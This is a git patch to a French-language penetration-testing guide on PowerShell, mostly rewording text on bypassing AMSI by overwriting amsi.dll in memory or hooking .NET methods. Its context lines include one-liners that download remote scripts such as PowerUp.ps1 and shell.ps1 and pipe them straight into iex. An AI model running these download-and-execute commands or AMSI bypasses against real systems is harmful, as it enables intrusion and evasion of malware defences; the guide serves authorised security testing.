From be9ed6b4cfb6931f91664c69160083309d0668da Mon Sep 17 00:00:00 2001 From: Translator Date: Wed, 22 Jan 2025 16:13:52 +0000 Subject: [PATCH] Translated ['src/windows-hardening/basic-powershell-for-pentesters/READM --- .../basic-powershell-for-pentesters/README.md | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/src/windows-hardening/basic-powershell-for-pentesters/README.md b/src/windows-hardening/basic-powershell-for-pentesters/README.md index 69c6c12b0..47be5b0bd 100644 --- a/src/windows-hardening/basic-powershell-for-pentesters/README.md +++ b/src/windows-hardening/basic-powershell-for-pentesters/README.md @@ -18,7 +18,6 @@ Get-Command -Module ``` ## Télécharger et exécuter ```powershell -g echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex" iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3 @@ -115,9 +114,9 @@ ValueData : 0 ``` ### Contournement AMSI -**`amsi.dll`** est **chargé** dans votre processus et a les **exports** nécessaires pour que toute application interagisse. Et parce qu'il est chargé dans l'espace mémoire d'un processus que vous **contrôlez**, vous pouvez changer son comportement en **écrasant des instructions en mémoire**. Ce qui le rend incapable de détecter quoi que ce soit. +**`amsi.dll`** est **chargé** dans votre processus et possède les **exports** nécessaires pour toute application avec laquelle interagir. Et parce qu'il est chargé dans l'espace mémoire d'un processus que vous **contrôlez**, vous pouvez changer son comportement en **écrasant des instructions en mémoire**. Ce qui le rend incapable de détecter quoi que ce soit. -Par conséquent, l'objectif des contournements AMSI que vous allez réaliser est de **écraser les instructions de cette DLL en mémoire pour rendre la détection inutile**. +Par conséquent, l'objectif des contournements AMSI que vous utiliserez est de **écraser les instructions de cette DLL en mémoire pour rendre la détection inutile**. **Page web du générateur de contournement AMSI** : [**https://amsi.fail/**](https://amsi.fail/) ```powershell @@ -168,7 +167,7 @@ https://slaeryan.github.io/posts/falcon-zero-alpha.html Vérifiez [**ce post pour des informations détaillées et le code**](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/). Introduction : -Cette nouvelle technique repose sur le hooking des appels API des méthodes .NET. Il s'avère que les méthodes .NET doivent être compilées en instructions machine natives en mémoire, ce qui finit par ressembler très fortement aux méthodes natives. Ces méthodes compilées peuvent être hookées pour changer le flux de contrôle d'un programme. +Cette nouvelle technique repose sur le hooking des appels API des méthodes .NET. Il s'avère que les méthodes .NET doivent être compilées en instructions machine natives en mémoire, qui finissent par ressembler très fortement aux méthodes natives. Ces méthodes compilées peuvent être hookées pour changer le flux de contrôle d'un programme. Les étapes pour effectuer le hooking des appels API des méthodes .NET sont : @@ -227,7 +226,9 @@ $shell = New-Object -com shell.application $rb = $shell.Namespace(10) $rb.Items() ``` -## Reconnaissance de Domaine +[https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/](https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/) + +## Reconnaissance de domaine {{#ref}} powerview.md